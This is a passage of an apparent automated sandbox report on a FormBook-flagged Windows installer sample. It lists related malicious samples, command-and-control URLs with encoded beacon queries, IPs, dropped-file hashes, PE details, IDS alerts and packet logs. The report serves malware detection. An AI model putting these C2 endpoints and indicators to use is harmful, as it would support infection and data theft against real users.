                    SOA-1236-1132220.exeGet hashmaliciousBrowse
                    • www.sculpturehairandfashion.com/eb4c/?XzutEP_p=P6Asbbp35dVbx0ZtMranlNi8cOD6gZ7tU8O91sGcdVH43MTDCTnQI916fdg+bpcXYR/t&y4=cJB8lRIP
                    DHLDOC.exeGet hashmaliciousBrowse
                    • www.frenziedflora.com/uite/?2dfdQn=GUK1Vall10Qvp6qkHVzXe/bl00mPL0YGU9DeHjRKlpe3amBZAMhNy4o9GEU3hkBodgXc&gPz=TjU4D
                    f2KeE36B3L.exeGet hashmaliciousBrowse
                    • www.supermut.com/oizo/?ZTyLR8=0eXGiD5xRoasQKP4aJiJduhFrjjKB4aiOXntiQDVlV8PTMz+NZ5C1y3gG0R0xBsPxtjG&v2JH1=q48p3TA86B
                    5UW4Epp3Ag.exeGet hashmaliciousBrowse
                    • www.checkouthomehd.com/nt3f/?Z6Ah-Jih=+gYr7h4/ytjStpSm5j52y1UdmmNz6LFPFRlci6r3dPbwlpLk+Ifa68R47BoR6yKRPlP1&oRq=1bpPDfBhsJkLY
                    triage_dropped_file.exeGet hashmaliciousBrowse
                    • www.ecommaxx.com/tu0h/?7n=7GEDPPJvKUJytApxXF2GdUuuDssCrMxlQr/j06gt6k/a6S3K05n2dFoG/ZmI75Cyq/7C&Sj=9rXH
                    vbc.exeGet hashmaliciousBrowse
                    • www.thebranddanymz.com/cxbz/?4hu8=2d98qN9pCR7&1bwh7j=xFBmpnViJkdZbK18C+QS0OISmzMjjobaaTqCRKmJlW9ko8DBqSna8Jsdb41VWnIyYdjcbJ4d5A==
                    DEC SOA_09012022.exeGet hashmaliciousBrowse
                    • www.toposales.com/igwa/?g48l=XV3pgJrpwxFtE2m0&NDK05LDp=ma6dGeieA/uMuLPHhGmEMO0MhvgJCSwWTtOunmNNbuA50fkYJarGKThxl5bT79VqZFZn
                    Ocxwgtrrxrnbohidoxavjksseafwerivek.exeGet hashmaliciousBrowse
                    • www.thewhole9bar.com/fm6i/?7nEDMf=R26H4x+Bf67Pd5XbK8CsM+BbnI+pJMVJsQN5zTod3KR1V2jNSHx1z2Pv9lmVWRWjUVdO&u8=y2MxCH
                    PO-28122021.exeGet hashmaliciousBrowse
                    • www.prime-spot.store/pt0e/?RnOt2nA8=fMIrw1bZdZIRxzK4AaK37j7a0eTbuYAl0zObDUXTX/SeKrJ9f13v3gOdUFJ0uepz0W0R&DBZHul=b0Gdyr1xKxfTHL
                    Shipping invoice2320214010.exeGet hashmaliciousBrowse
                    • www.naughtyhours.com/posg/?7nO=b/go94L/Mk+qNWhvewSKxjJhT/qKvB2n//lEbiD7hBM5nM8kdvZuZgpO4gSqxjSEDD2f&fDK=MlxT2Vgh5DzDYhA
                    Payment Advice.exeGet hashmaliciousBrowse
                    • www.ecodesignreadystoves.com/ic0e/?fVK=TzqtHnHn3R6+Tisacm6UiD7HXANfyqMQoOZGV5oC6fDoL43U1fdVoGtE2jLf4dc+Qpud&5jO=BVaxs
                    HvyylYzB2G.exeGet hashmaliciousBrowse
                    • www.childzplanet.com/b62n/?U48h=2K+ErbM2Q9PxkNCuEpVtXoSW3Ae+IEuega4s0riu//FbsSnPyXUPZw2sp7BESUuJHauA&lbAh=LnxhzXwX2f
                    Shipping_Doc_0000000.docGet hashmaliciousBrowse
                    • www.spoilthemrottenpets.com/b62n/?2d=ipB47&-Z8=B2by9w75cT+byaXwmduIW50UJjgWuwleivjT8ZcXlHOevpeyJ8zxEMvVHUaplLN9VMqEsg==
                    nbg6l8NcIU.exeGet hashmaliciousBrowse
                    • www.retro-kids.com/nxqc/?9rWh=EdyV8gXoJBVjDaIfVqV97TfDDRoJN4pkaQdPTCe4ofJIn5lNQ9U476H3hRsWwwxA69gj&Vhf=0bphUrW
                    DHL AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
                    • www.aurorarift.com/a34b/?iL3=bGLTJw6QblJppFPFkyqNXj5+nxRGhZbbu4/bXCzuJmwdrOQK4swdr7PlaxBp7GxL6J8a&u6V=6lsTdv8hOBKHab90
                    IdSKRE4TmL.exeGet hashmaliciousBrowse
                    • www.clazzicqueen.com/g64e/?fPMp3b=0DKxZxB0F&P84hb23P=NbNeipRwHgXR/HGXze2iWx+yt2CkdK9Ds+hO+HiMBVLLxOSdrlFVPN8+ocA7tYepnD3X
                    a782DP4mA9.exeGet hashmaliciousBrowse
                    • www.marypetshop.com/c2wb/?7npXGr=v0DDPDNPT&cHnpM6Hh=t/9eHaU/2RtBSCuJ7Xj48riBqlwaKzXmWuNqOgHpdfMBoR9GlNjnIPRu4MN96Sx/k6Sq

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    www.alibabasdeli.comHU1rz9Czoh.exeGet hashmaliciousBrowse
                    • 172.67.173.57
                    681YGHm4x9.exeGet hashmaliciousBrowse
                    • 104.21.30.160
                    9JBoWczN3h.exeGet hashmaliciousBrowse
                    • 172.67.173.57
                    www.mnbvending.comRFQ-2201747.xlsxGet hashmaliciousBrowse
                    • 199.59.243.200
                    shops.myshopify.comPO789.docGet hashmaliciousBrowse
                    • 23.227.38.74
                    ihJ4eSV1of.exeGet hashmaliciousBrowse
                    • 23.227.38.74
                    Proforma-Invoice.exeGet hashmaliciousBrowse
                    • 23.227.38.74
                    SOA-1236-1132220.exeGet hashmaliciousBrowse
                    • 23.227.38.74
                    DHLDOC.exeGet hashmaliciousBrowse
                    • 23.227.38.74
                    Payment-402.exeGet hashmaliciousBrowse
                    • 23.227.38.74
                    r#U00e1pida confirmaci#U00f3n.exeGet hashmaliciousBrowse
                    • 23.227.38.74
                    f2KeE36B3L.exeGet hashmaliciousBrowse
                    • 23.227.38.74
                    5UW4Epp3Ag.exeGet hashmaliciousBrowse
                    • 23.227.38.74
                    triage_dropped_file.exeGet hashmaliciousBrowse
                    • 23.227.38.74
                    vbc.exeGet hashmaliciousBrowse
                    • 23.227.38.74
                    DEC SOA_09012022.exeGet hashmaliciousBrowse
                    • 23.227.38.74
                    Ocxwgtrrxrnbohidoxavjksseafwerivek.exeGet hashmaliciousBrowse
                    • 23.227.38.74
                    PO-28122021.exeGet hashmaliciousBrowse
                    • 23.227.38.74
                    Shipping invoice2320214010.exeGet hashmaliciousBrowse
                    • 23.227.38.74
                    Payment Advice.exeGet hashmaliciousBrowse
                    • 23.227.38.74
                    HvyylYzB2G.exeGet hashmaliciousBrowse
                    • 23.227.38.74
                    Shipping_Doc_0000000.docGet hashmaliciousBrowse
                    • 23.227.38.74
                    nbg6l8NcIU.exeGet hashmaliciousBrowse
                    • 23.227.38.74
                    DHL AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
                    • 23.227.38.74

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    CLOUDFLARENETUSPPsa8TXVuy.exeGet hashmaliciousBrowse
                    • 162.159.129.233
                    JV4ILFxpDY.exeGet hashmaliciousBrowse
                    • 162.159.134.233
                    gLD9IA2G4A.exeGet hashmaliciousBrowse
                    • 162.159.129.233
                    db0fa4b8db0333367e9bda3ab68b8042.x86Get hashmaliciousBrowse
                    • 172.68.102.186
                    db0fa4b8db0333367e9bda3ab68b8042.x86Get hashmaliciousBrowse
                    • 172.68.102.164
                    U3E7zMaux2.exeGet hashmaliciousBrowse
                    • 162.159.130.233
                    r#U00e1pida confirmaci#U00f3n.exeGet hashmaliciousBrowse
                    • 162.159.133.233
                    0Cjy7Lkv1A.exeGet hashmaliciousBrowse
                    • 162.159.134.233
                    4599.htmlGet hashmaliciousBrowse
                    • 104.16.19.94
                    1Nb1LqIIq2Get hashmaliciousBrowse
                    • 172.65.156.182
                    Doc3038210381 pdf.htmlGet hashmaliciousBrowse
                    • 172.67.167.234
                    HyjRfWrgtYGet hashmaliciousBrowse
                    • 172.65.108.237
                    lAbrw2L5lmGet hashmaliciousBrowse
                    • 172.68.102.188
                    37JgXWXJaJGet hashmaliciousBrowse
                    • 172.68.102.180
                    emPJndhuvA.exeGet hashmaliciousBrowse
                    • 162.159.129.233
                    PwlvCShFVJ.exeGet hashmaliciousBrowse
                    • 104.21.38.221
                    Invoice Slide.ppamGet hashmaliciousBrowse
                    • 104.16.203.237
                    Fw-Remittance copy. Invoice No.791278447.HTMLGet hashmaliciousBrowse
                    • 104.16.19.94
                    PO 182782.ppamGet hashmaliciousBrowse
                    • 104.16.203.237
                    WZ454554.exeGet hashmaliciousBrowse
                    • 162.159.135.233
                    CLOUDFLARENETUSPPsa8TXVuy.exeGet hashmaliciousBrowse
                    • 162.159.129.233
                    JV4ILFxpDY.exeGet hashmaliciousBrowse
                    • 162.159.134.233
                    gLD9IA2G4A.exeGet hashmaliciousBrowse
                    • 162.159.129.233
                    db0fa4b8db0333367e9bda3ab68b8042.x86Get hashmaliciousBrowse
                    • 172.68.102.186
                    db0fa4b8db0333367e9bda3ab68b8042.x86Get hashmaliciousBrowse
                    • 172.68.102.164
                    U3E7zMaux2.exeGet hashmaliciousBrowse
                    • 162.159.130.233
                    r#U00e1pida confirmaci#U00f3n.exeGet hashmaliciousBrowse
                    • 162.159.133.233
                    0Cjy7Lkv1A.exeGet hashmaliciousBrowse
                    • 162.159.134.233
                    4599.htmlGet hashmaliciousBrowse
                    • 104.16.19.94
                    1Nb1LqIIq2Get hashmaliciousBrowse
                    • 172.65.156.182
                    Doc3038210381 pdf.htmlGet hashmaliciousBrowse
                    • 172.67.167.234
                    HyjRfWrgtYGet hashmaliciousBrowse
                    • 172.65.108.237
                    lAbrw2L5lmGet hashmaliciousBrowse
                    • 172.68.102.188
                    37JgXWXJaJGet hashmaliciousBrowse
                    • 172.68.102.180
                    emPJndhuvA.exeGet hashmaliciousBrowse
                    • 162.159.129.233
                    PwlvCShFVJ.exeGet hashmaliciousBrowse
                    • 104.21.38.221
                    Invoice Slide.ppamGet hashmaliciousBrowse
                    • 104.16.203.237
                    Fw-Remittance copy. Invoice No.791278447.HTMLGet hashmaliciousBrowse
                    • 104.16.19.94
                    PO 182782.ppamGet hashmaliciousBrowse
                    • 104.16.203.237
                    WZ454554.exeGet hashmaliciousBrowse
                    • 162.159.135.233

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\nsx7FAE.tmp
                    Process:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):252172
                    Entropy (8bit):7.750682379260983
                    Encrypted:false
                    SSDEEP:6144:118MKS5foIrwbBl2/IO4cwyjICBga9xtqS+W:0MKS5pwdQIC99xtqA
                    MD5:8644B9AA55DCA97B4841D7C3878444C7
                    SHA1:1B7CD31D5C9509868830982D39D9A3F75B7E3AD4
                    SHA-256:C41772CB8BD860959A61F832E221F9DC634BEBD8FE4CD141E45321E348EB4181
                    SHA-512:2DEE50DCEDF000EC57222C3D12B30F7905B18977C929C14517A0DC2937DA7B6CFF0D7FBB093059AE5607AB3C3341C856FEACD4CFAC23C89F20EBBFD50B174513
                    Malicious:false
                    Reputation:low
                    Preview: .X......,.......................,C.......X.......X..........................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dll
                    Process:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):4608
                    Entropy (8bit):3.8072208508576035
                    Encrypted:false
                    SSDEEP:24:e31GSNNCc0teIAUdax/+TCA5dieD4ueeDFE8hueeYoNXs+f3SlLRQ0K7ABPnRuVL:CnC/I9GTxieBJInFbfGFN1RuqS
                    MD5:D62257B9F46BB3ECC454D94B80E839E8
                    SHA1:A33070571B7909CEB589F9CCEB8591EE2DAE5C9F
                    SHA-256:9679F0E8F63974D80F953B8212B2668C27EC9762CDCF6ACBFD4FDF4B6D189F23
                    SHA-512:065531AFC2DA7DD6CECC893C13E41A1F15E0FC670E0DDC006E6F87CF5CB7A9B94D36275D2050953A11350590AC4D1B1B5FB89ACAA3C6B1F3F6C466D5E155F907
                    Malicious:false
                    Reputation:low
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z-...C]..C]..C]Z.M]..C].}B\..C]..B]..C].nG\..C].nC\..C].n.]..C].nA\..C]Rich..C]........................PE..L......a...........!......................... ...............................P............@.......................... ..H.... .......0.......................@..<.................................................... ...............................text...Q........................... ..`.rdata....... ......................@..@.rsrc........0......................@..@.reloc..<....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\pawgjsvu
                    Process:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4769
                    Entropy (8bit):6.209190395428905
                    Encrypted:false
                    SSDEEP:96:/s3+C1lu78g/85QphY5tVXUcbaLrVJ83Z/Lj+HNdC+cR3Sc3owy8WwXfUE/gmc01:i+CW8Q85ghY5tVkcbkU3hFdowyPwPUEX
                    MD5:2CF23E8F99E539C2CFA7DF0709FFE950
                    SHA1:B0DEF49E4CA1DE39D60696FFEC5EC6ECB9399D3C
                    SHA-256:C71C94E4AA37C19EE3E62E4F20D03CE4950D9B7BCA8755B3729CBDB7897B6FDE
                    SHA-512:0A028931CFE2F89C9324BA125DDFE576051CE68AFE556700D89EB74F0EC19DDBE1AB2C2E7AE96523CE231B47A18E5DB4935EF22E68F8708BC7663060F888D11E
                    Malicious:false
                    Reputation:low
                    Preview: ..aa\2...!zOV.,.a.V....L..V....L..,.a.LUiaaa.,.a^<.^<.4L.q.daaa(L.(\u^<.^<.4L.q..aaa(L.(\.^<.^<.4L.q..aaa(L.(\.^<.^<.4L.q..aaa(L.(\...]/+[.YR.jjL..(L.(\}2L..]..(L.(t.2L.2tU4]...[....2L.j\U4].(LUVO(,..}.[..aaaa.]=..,U^<..^<..^<. Y^<. .^<..^<....M.&I2..&I(e.A..`<.^<. .2L...(L.j,U.aaaa..=]Jaaa.]=..2,...2L....2...a\2.pp.V....L.2L.2a"L.ZA2L.2a2t.2..(\.2..](LU2L.2a!2t.(`2L.2\U2...a).k..9.aa.G.aa.a).^~...aa...aa.a)....m.aa.{.aa.a\2...i.V....L..L..aaa4L.(LU..aM.2LU.aa2LU!(LU2L.I(L..}...aa..M?2L..[..R.a(...(m.u4L..[....a(...(m.u[.[.YR.a4...q).^~..`aaq..d^^(L..4L.q^<..{^^^(L....aM..,.a..L.`aaa2L.2...]a\2...!.V....L..L.iaaa4L.(LU..aM.2LU.aa2LU!(LU2L.I(L..}..]aa....;aaa2L..[..R.a(...(m..2L..[....a(...(m..2L..[....(...(m..2L...[..R.j(...(e..4L..[.....(...(m..[.[.YR.a4...q).k...aaaq..U^^(L...aM.2L.2t.(`.^<.^<.^<.^<.^<..vW^^(L....aM..,.a..L.`aaa2L.2...a\2...5.L..aaa4L}(LU..aM.2LU.aa2LU!(LU2L.I(L..}.[jaa..M?2L..[..R.a(..}(m..2L..[....a(..}(m..[.[.YR.a4..}q)....faaaq.=U^^(L..^<
                    C:\Users\user\AppData\Local\Temp\zn2eyxxq9ww5zrdhr
                    Process:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):220020
                    Entropy (8bit):7.992864927984938
                    Encrypted:true
                    SSDEEP:6144:7MKS5foIrwbBl2/IO4cwyjICBga9xtqS+Wx:7MKS5pwdQIC99xtqAx
                    MD5:A75D055E6FABC0D24984208FC2BD8877
                    SHA1:F4071D8B3141A30FC0D70787D174B8E31C6131FC
                    SHA-256:6497E85685A07951F80AE543BB730D7714717596140569E4D5C9388F2E6CBE59
                    SHA-512:3A09EEF95C13AF84D71512DBFCDB2C6D87412844443411E2235E47797E9582A12FEA44848E1037B7C56C60E233CC2EA962E59BEE917F13C60103B2B196A51F4E
                    Malicious:false
                    Reputation:low
                    Preview: .....r_..oJ...Pae...w.;.z..o../"j...p.$(<h...g....=.}4..y_e..+;...y...r......Q.._..p5$...q.......D..@....1...>G.`.OY...2.t=.)....o.....[P.u.>q.?O..........h..q......0.).Jn..%..r.M......U..,4.T.!/......N^........d....Kqt1G..G...;...k)`=@.Ow.>I.........vf.eF....:S...-"../"c...p.$(.h...g.,..=.}4..y_;!..;...`..Hc..e.|c.8...0..O|..D.h.Q.....^*"...i3....`.`.OY..F......k8.V...D..4..ML$.....bQ...m{.....uw.;^...0.).|.].E..r.H..G...A,.T.!/........V.h......d..H.Kq[1G.........k)`D@.Qw.>I..r......v..eFR...:S.+..o../"j...p.$(<h...g....=.}4..y_;!..;...`..Hc..e.|c.8...0..O|..D.h.Q.....^*"...i3....`.`.OY..F......k8.V...D..4..ML$.....bQ...m{.....uw.;^...0.).Jn..%..r,...G..m.A,4.T.!/.......NV........d..H.Kq[1G.........k)`D@.Qw.>I..r......v..eFR...:S.+..o../"j...p.$(<h...g....=.}4..y_;!..;...`..Hc..e.|c.8...0..O|..D.h.Q.....^*"...i3....`.`.OY..F......k8.V...D..4..ML$.....bQ...m{.....uw.;^...0.).Jn..%..r,...G..m.A,4.T.!/.......NV........d.

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                    Entropy (8bit):7.927911380419802
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 92.16%
                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:nji3Lg1ot6.exe
                    File size:248302
                    MD5:8eddcc35719034649f6947b2b08bcdf3
                    SHA1:5506b69b4584f43232f45299192a540ec0197998
                    SHA256:0d072a60b433f330d2ba97d75eae7af07e9d75bc6ed5b1065287661d05e82ab6
                    SHA512:c7716daafffd44dff6143d7fe0fb686eb5fc08da918aab204ae6d7c8687dc914d9310d488a2ffc4767e5fd643e8aee6d88fadf28d156c6be731c29bcc3943681
                    SSDEEP:6144:owzN+wRSsYU12O6NgFRQbIuoKFFmhmvk8nw:fN+w8KCWRbRKF7vkR
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

                    File Icon

                    Icon Hash:b2a88c96b2ca6a72

                    Static PE Info

                    General

                    Entrypoint:0x403225
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    DLL Characteristics:
                    Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:099c0646ea7282d232219f8807883be0

                    Entrypoint Preview

                    Instruction
                    sub esp, 00000180h
                    push ebx
                    push ebp
                    push esi
                    xor ebx, ebx
                    push edi
                    mov dword ptr [esp+18h], ebx
                    mov dword ptr [esp+10h], 00409128h
                    xor esi, esi
                    mov byte ptr [esp+14h], 00000020h
                    call dword ptr [00407030h]
                    push 00008001h
                    call dword ptr [004070B4h]
                    push ebx
                    call dword ptr [0040727Ch]
                    push 00000008h
                    mov dword ptr [00423F58h], eax
                    call 00007F1618B45960h
                    mov dword ptr [00423EA4h], eax
                    push ebx
                    lea eax, dword ptr [esp+34h]
                    push 00000160h
                    push eax
                    push ebx
                    push 0041F450h
                    call dword ptr [00407158h]
                    push 004091B0h
                    push 004236A0h
                    call 00007F1618B45617h
                    call dword ptr [004070B0h]
                    mov edi, 00429000h
                    push eax
                    push edi
                    call 00007F1618B45605h
                    push ebx
                    call dword ptr [0040710Ch]
                    cmp byte ptr [00429000h], 00000022h
                    mov dword ptr [00423EA0h], eax
                    mov eax, edi
                    jne 00007F1618B42E2Ch
                    mov byte ptr [esp+14h], 00000022h
                    mov eax, 00429001h
                    push dword ptr [esp+14h]
                    push eax
                    call 00007F1618B450F8h
                    push eax
                    call dword ptr [0040721Ch]
                    mov dword ptr [esp+1Ch], eax
                    jmp 00007F1618B42E85h
                    cmp cl, 00000020h
                    jne 00007F1618B42E28h
                    inc eax
                    cmp byte ptr [eax], 00000020h
                    je 00007F1618B42E1Ch
                    cmp byte ptr [eax], 00000022h
                    mov byte ptr [eax+eax+00h], 00000000h

                    Rich Headers

                    Programming Language:
                    • [EXP] VC++ 6.0 SP5 build 8804

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x900.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x59760x5a00False0.668619791667data6.46680044621IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    .rdata0x70000x11900x1200False0.444878472222data5.17796812871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x90000x1af980x400False0.55078125data4.68983486809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .rsrc0x2c0000x9000xa00False0.409375data3.94693169534IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountry
                    RT_ICON0x2c1900x2e8dataEnglishUnited States
                    RT_DIALOG0x2c4780x100dataEnglishUnited States
                    RT_DIALOG0x2c5780x11cdataEnglishUnited States
                    RT_DIALOG0x2c6980x60dataEnglishUnited States
                    RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                    RT_MANIFEST0x2c7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                    Imports

                    DLLImport
                    KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                    USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                    SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                    ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                    VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    01/14/22-03:39:09.329226TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981980192.168.2.323.227.38.74
                    01/14/22-03:39:09.329226TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981980192.168.2.323.227.38.74
                    01/14/22-03:39:09.329226TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981980192.168.2.323.227.38.74
                    01/14/22-03:39:09.373367TCP1201ATTACK-RESPONSES 403 Forbidden804981923.227.38.74192.168.2.3

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 14, 2022 03:38:27.771661997 CET4979380192.168.2.350.31.177.38
                    Jan 14, 2022 03:38:27.889265060 CET804979350.31.177.38192.168.2.3
                    Jan 14, 2022 03:38:27.889566898 CET4979380192.168.2.350.31.177.38
                    Jan 14, 2022 03:38:27.889576912 CET4979380192.168.2.350.31.177.38
                    Jan 14, 2022 03:38:28.008744001 CET804979350.31.177.38192.168.2.3
                    Jan 14, 2022 03:38:28.376822948 CET4979380192.168.2.350.31.177.38
                    Jan 14, 2022 03:38:28.461199999 CET804979350.31.177.38192.168.2.3
                    Jan 14, 2022 03:38:28.461220026 CET804979350.31.177.38192.168.2.3
                    Jan 14, 2022 03:38:28.461890936 CET4979380192.168.2.350.31.177.38
                    Jan 14, 2022 03:38:28.461905003 CET4979380192.168.2.350.31.177.38
                    Jan 14, 2022 03:38:28.495172024 CET804979350.31.177.38192.168.2.3
                    Jan 14, 2022 03:38:28.495368004 CET4979380192.168.2.350.31.177.38
                    Jan 14, 2022 03:38:48.657919884 CET4980880192.168.2.3172.67.173.57
                    Jan 14, 2022 03:38:48.675013065 CET8049808172.67.173.57192.168.2.3
                    Jan 14, 2022 03:38:48.677712917 CET4980880192.168.2.3172.67.173.57
                    Jan 14, 2022 03:38:48.677973032 CET4980880192.168.2.3172.67.173.57
                    Jan 14, 2022 03:38:48.694858074 CET8049808172.67.173.57192.168.2.3
                    Jan 14, 2022 03:38:48.705641031 CET8049808172.67.173.57192.168.2.3
                    Jan 14, 2022 03:38:48.706160069 CET8049808172.67.173.57192.168.2.3
                    Jan 14, 2022 03:38:48.706252098 CET4980880192.168.2.3172.67.173.57
                    Jan 14, 2022 03:38:48.706278086 CET4980880192.168.2.3172.67.173.57
                    Jan 14, 2022 03:38:48.723239899 CET8049808172.67.173.57192.168.2.3
                    Jan 14, 2022 03:39:09.311626911 CET4981980192.168.2.323.227.38.74
                    Jan 14, 2022 03:39:09.328722000 CET804981923.227.38.74192.168.2.3
                    Jan 14, 2022 03:39:09.328953028 CET4981980192.168.2.323.227.38.74
                    Jan 14, 2022 03:39:09.329226017 CET4981980192.168.2.323.227.38.74
                    Jan 14, 2022 03:39:09.346127987 CET804981923.227.38.74192.168.2.3
                    Jan 14, 2022 03:39:09.373367071 CET804981923.227.38.74192.168.2.3
                    Jan 14, 2022 03:39:09.373408079 CET804981923.227.38.74192.168.2.3
                    Jan 14, 2022 03:39:09.373435974 CET804981923.227.38.74192.168.2.3
                    Jan 14, 2022 03:39:09.373460054 CET804981923.227.38.74192.168.2.3
                    Jan 14, 2022 03:39:09.373477936 CET804981923.227.38.74192.168.2.3
                    Jan 14, 2022 03:39:09.373492002 CET804981923.227.38.74192.168.2.3
